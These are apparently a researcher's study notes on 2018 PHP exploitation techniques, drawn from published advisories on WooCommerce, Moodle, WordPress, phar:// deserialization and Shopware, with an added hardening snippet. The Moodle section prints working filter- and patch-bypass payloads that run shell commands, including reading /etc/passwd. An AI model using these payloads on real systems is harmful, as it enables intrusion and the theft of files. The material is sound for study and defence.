Latest PHP Exploitation Techniques of 2018
This post goes through several new PHP exploitation methods I studied; these are my notes.
- File deletion vulnerabilities, unlink()
- Phar deserialization, file*()
- PHP object instantiation, ReflectionClass()
0x01 WordPress Design Flaw Leads to WooCommerce RCE
WooCommerce versions before 3.4.6 contain an arbitrary file deletion vulnerability; combined with a WordPress design flaw, it leads to a takeover of the whole site.
Design flaw:
- After the WooCommerce plugin is disabled, the edit_users capability it granted still exists
- But the plugin's disallow_editing_of_admins filter is no longer triggered
- Normally only administrators can disable plugins (but here we have arbitrary file deletion, which amounts to disabling the plugin)
Reference:
https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/
0x02 Moodle < 3.5.0 Code Injection
First, a teacher role is required (it can be obtained via XSS).
The eval() function is used:
```php
public function substitute_variables_and_eval($str, $dataset) {
    // substitutes {x} and {y} for numbers like 1.2 with str_replace():
    $formula = $this->substitute_variables($str, $dataset);
    if ($error = qtype_calculated_find_formula_errors($formula)) {
        return $error; // formula security mechanism
    }
    $str = null;
    eval('$str = ' . $formula . ';'); // dangerous eval()-call
    return $str;
}
```
But there is a filter:
```php
function qtype_calculated_find_formula_errors($formula) {
    // Returns false if everything is alright
    // otherwise it constructs an error message.
    // Strip away dataset names.
    while (preg_match('~\\{[[:alpha:]][^>} <{"\']*\\}~', $formula, $regs)) {
        $formula = str_replace($regs[0], '1', $formula);
    }
    // Strip away empty space and lowercase it.
    $formula = strtolower(str_replace(' ', '', $formula));
    $safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
    $operatorornumber = "[{$safeoperatorchar}.0-9eE]";
    // [...]
    if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
        return get_string('illegalformulasyntax', 'qtype_calculated', $regs[0]);
    } else {
        // Formula just might be valid.
        return false;
    }
}
```
Bypassing the filter

Payloads:
```
1. {a.`$_GET[0]`}
2. /*{a*/`$_GET[0]`;//{x}}  =>  0=(date;cat/etc/passwd)>../hi.txt
```
Bypassing the official patches
1. Blacklist
Patch description: loop over the input checking whether it contains //, /* or #
```php
function qtype_calculated_find_formula_errors($formula) {
    foreach (['//', '/*', '#'] as $commentstart) {
        if (strpos($formula, $commentstart) !== false) {
            return get_string('illegalformulasyntax', 'qtype_calculated', $commentstart);
        }
    }
    // [...]
}
```
Payload:
```
1?><?=log(1){a.`$_GET[0]`.({x})}?>
```
2. Reject nested placeholders
```php
public function find_dataset_names($text) {
    // Returns the possible dataset names found in the text as an array.
    // The array has the dataset name for both key and value.
    if (preg_match_all('~\\{([[:alpha:]][^>} <{"\']*)\\}~', $text, $regs)) {
        $datasetnames = array_unique($regs[1]);
        return array_combine($datasetnames, $datasetnames);
    } else {
        return [];
    }
}
// [...]
function qtype_calculated_find_formula_errors($formula) {
    $datasetnames = find_dataset_names($formula);
    foreach ($datasetnames as $datasetname) {
        $formula = str_replace('{' . $datasetname . '}', '1', $formula);
    }
    // [...]
}
```
Payload:
```
/*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/
```
3. Blacklist + linear replacement
Bypassed by controlling the XML.
Reference:
https://blog.ripstech.com/2018/moodle-remote-code-execution/
0x03 WordPress File Delete to Code Execution
Affected versions: <= 4.9.6
Prerequisite: permission to delete media files (obtainable only through another vulnerability or a misconfiguration)
Deletion targets:
.htaccess
Sometimes contains security policies (e.g. access restrictions on certain directories); deleting it renders those policies ineffective.
index.php files
Usually empty, and mainly there to prevent directory listing; once deleted, the directory may become listable.
wp-config.php
Once this is deleted, WordPress has to be reinstalled.
Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
0x04 Phar:// Deserialization
Sensitive functions (any of these accepts a phar:// path and triggers deserialization of the archive's metadata):
```php
include('phar://test.phar');
file_get_contents('phar://test.phar');
file_put_contents('phar://test.phar', '');
copy('phar://test.phar', '');
file_exists('phar://test.phar');
is_executable('phar://test.phar');
is_file('phar://test.phar');
is_dir('phar://test.phar');
is_link('phar://test.phar');
is_writable('phar://test.phar');
fileperms('phar://test.phar');
fileinode('phar://test.phar');
filesize('phar://test.phar');
fileowner('phar://test.phar');
filegroup('phar://test.phar');
fileatime('phar://test.phar');
filemtime('phar://test.phar');
filectime('phar://test.phar');
filetype('phar://test.phar');
getimagesize('phar://test.phar');
exif_read_data('phar://test.phar');
stat('phar://test.phar');
lstat('phar://test.phar');
touch('phar://test.phar');
md5_file('phar://test.phar');
```
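As an added hardening example (not code from the original post or from any of the referenced projects), here is a path check that refuses stream wrappers before a user-controlled file name reaches file_exists(), plus unregistering the phar:// wrapper for applications that never load .phar archives; the function names, the upload directory and the sample inputs are assumptions.

```php
<?php
// Added hardening example, not from the original post. Names below are illustrative.

// Returns true only for a plain relative path with no scheme, no NUL byte and no
// traversal that resolves to a file inside $baseDir.
function is_safe_local_path(string $path, string $baseDir): bool {
    // Any "scheme://" prefix (phar://, data://, compress.zlib://, ...) is refused,
    // including mixed-case variants and leading whitespace.
    if (preg_match('~^\s*[a-z][a-z0-9+.\-]*://~i', $path)) {
        return false;
    }
    if (strpos($path, "\0") !== false || strpos($path, '..') !== false) {
        return false;
    }
    // realpath() returns false for a missing file, which is also a safe answer here.
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $path);
    $base = realpath($baseDir);
    return $real !== false && $base !== false
        && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Disable the phar wrapper unless the application really loads .phar archives;
// afterwards file_exists('phar://...') and friends cannot unserialize phar metadata.
function disable_phar_wrapper(): void {
    if (in_array('phar', stream_get_wrappers(), true)) {
        stream_wrapper_unregister('phar');
    }
}

// Wrapper around file_exists() that applies both mitigations.
function safe_file_exists(string $userPath, string $uploadDir): bool {
    disable_phar_wrapper();
    if (!is_safe_local_path($userPath, $uploadDir)) {
        return false;
    }
    return file_exists($uploadDir . DIRECTORY_SEPARATOR . $userPath);
}

// Constructed sample inputs (assumed upload directory: the system temp dir).
$uploadDir = sys_get_temp_dir();
var_dump(safe_file_exists('avatar.jpg', $uploadDir));         // true only if that file exists
var_dump(safe_file_exists('phar://evil.jpg/x', $uploadDir));  // bool(false): wrapper refused
var_dump(safe_file_exists('../../etc/passwd', $uploadDir));   // bool(false): traversal refused
```

The wrapper check and the traversal check are independent: either alone would miss one of the two rejected inputs above.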
See also:
https://blog.ripstech.com/2018/new-php-exploitation-technique/
http://seaii-blog.com/index.php/2018/08/23/86.html
https://www.anquanke.com/post/id/157657
https://www.anquanke.com/post/id/157439
0x05 Shopware < 5.3.4 PHP Object Instantiation to XXE to RCE
Affected versions: Shopware version <= 5.3.3 and >= 5.1
XSS→POI→XMLi→XXE→PHAR→POI→POP→RCE
I just found that someone has already translated this one:
https://www.freebuf.com/vuls/154415.html